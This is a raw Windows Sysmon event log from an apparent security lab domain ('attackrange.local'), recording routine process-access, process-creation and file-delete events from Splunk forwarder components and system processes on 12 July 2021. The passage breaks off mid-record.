08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.523{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A369D341BB5B1950865FA34513722F1,SHA256=C431DFE6B59CF370F2CBA01DF283C48F94B3C133968B89A40E97766C07F2BDDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E51715FBC09282897120AE5B1A3C781D,SHA256=8608182D78B91B47E880638A17DC1E45055839035AA8944BCBE6F3D28C979FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9807F1D7680269CF34454697583D8A68,SHA256=8F23BBED3999905C23212CF32C8DA624F75C91CE62AFBC3F0C9FA9CDAEF7334A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:26.567{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A1E0B19C39FE78DDD5EEB85B2D751E,SHA256=B001D857E9C9B5E44DB026E28DE098FB96504D199BE82E5ACA0D02D7C121BFF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.897{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35131BDE4492473F9F6C2C9D6814C826,SHA256=E7F5AEB7CF6832AD713F459CDAAC407BE1F5C2A4E4ACC14C034D1C3D6DFE3DF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E51715FBC09282897120AE5B1A3C781D,SHA256=8608182D78B91B47E880638A17DC1E45055839035AA8944BCBE6F3D28C979FCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program 